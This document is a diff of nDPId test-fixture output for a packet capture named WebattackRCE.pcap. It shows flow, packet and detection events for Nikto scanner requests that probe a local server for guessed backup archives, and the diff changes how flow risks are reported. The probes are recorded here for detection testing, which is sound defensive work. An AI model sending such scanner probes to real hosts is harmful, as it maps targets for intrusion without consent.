{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":138,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276884,"flow_last_seen":1576420276884,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276884,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49820,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1576420276884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420276884,"pkt":"AAAAAAAAAAAAAAAACABFAADAT5pAAEAG7Jt\/AAABfwAAAcKcH5DBOXfeD5T\/lYAYAED+tAAAAQEICp1m+7udZvu7R0VUIC8xMjcwLnRhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":138,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276884,"flow_last_seen":1576420276884,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276884,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49820,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":138,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276884,"flow_last_seen":1576420276884,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276884,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49820,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276885,"flow_last_seen":1576420276885,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49822,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1576420276885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420276885,"pkt":"AAAAAAAAAAAAAAAACABFAADFQQ5AAEAG+yJ\/AAABfwAAAcKeH5AdhXlKg0oevYAYAED+uQAAAQEICp1m+72dZvu9R0VUIC8xMjcuMC4wLjEuYWx6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276885,"flow_last_seen":1576420276885,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49822,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276885,"flow_last_seen":1576420276885,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49822,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276886,"flow_last_seen":1576420276886,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276886,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49824,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1576420276886,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420276886,"pkt":"AAAAAAAAAAAAAAAACABFAADFWJBAAEAG46B\/AAABfwAAAcKgH5CSJ2DMWYYFgIAYAED+uQAAAQEICp1m+76dZvu+R0VUIC8xMjcuMC4wLjEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276886,"flow_last_seen":1576420276886,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276886,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49824,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276886,"flow_last_seen":1576420276886,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276886,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49824,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":141,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276888,"flow_last_seen":1576420276888,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276888,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49826,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00654{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1576420276888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420276888,"pkt":"AAAAAAAAAAAAAAAACABFAAC95a1AAEAGVot\/AAABfwAAAcKiH5DfWN3u+DsBkYAYAED+sQAAAQEICp1m+8CdZvvAR0VUIC8wLnppcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276888,"flow_last_seen":1576420276888,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276888,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49826,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276888,"flow_last_seen":1576420276888,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276888,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49826,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276890,"flow_last_seen":1576420276890,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49828,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1576420276890,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420276890,"pkt":"AAAAAAAAAAAAAAAACABFAAC9vy5AAEAGfQp\/AAABfwAAAcKkH5Dme4drk\/tL44AYAED+sQAAAQEICp1m+8KdZvvCR0VUIC8wLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276890,"flow_last_seen":1576420276890,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49828,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276890,"flow_last_seen":1576420276890,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420276890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49828,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":143,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276891,"flow_last_seen":1576420276891,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276891,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49830,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1576420276891,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420276891,"pkt":"AAAAAAAAAAAAAAAACABFAADF\/ZdAAEAGPpl\/AAABfwAAAcKmH5DYD8XTrc+7CoAYAED+uQAAAQEICp1m+8OdZvvDR0VUIC8xMjcuMC4wLjEudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":143,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276891,"flow_last_seen":1576420276891,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276891,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49830,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":143,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276891,"flow_last_seen":1576420276891,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276891,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49830,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276893,"flow_last_seen":1576420276893,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49832,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1576420276893,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420276893,"pkt":"AAAAAAAAAAAAAAAACABFAADFI6xAAEAGGIV\/AAABfwAAAcKoH5Ar0hvuzfCq7oAYAED+uQAAAQEICp1m+8WdZvvFR0VUIC8xMjcuMC4wLjEudGFyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276893,"flow_last_seen":1576420276893,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49832,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276893,"flow_last_seen":1576420276893,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49832,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":145,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276894,"flow_last_seen":1576420276894,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276894,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49834,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1576420276894,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420276894,"pkt":"AAAAAAAAAAAAAAAACABFAADDA5ZAAEAGOJ1\/AAABfwAAAcKqH5B\/mzvUPuYs44AYAED+twAAAQEICp1m+8adZvvGR0VUIC8xMjcudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276894,"flow_last_seen":1576420276894,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276894,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49834,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276894,"flow_last_seen":1576420276894,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276894,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49834,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
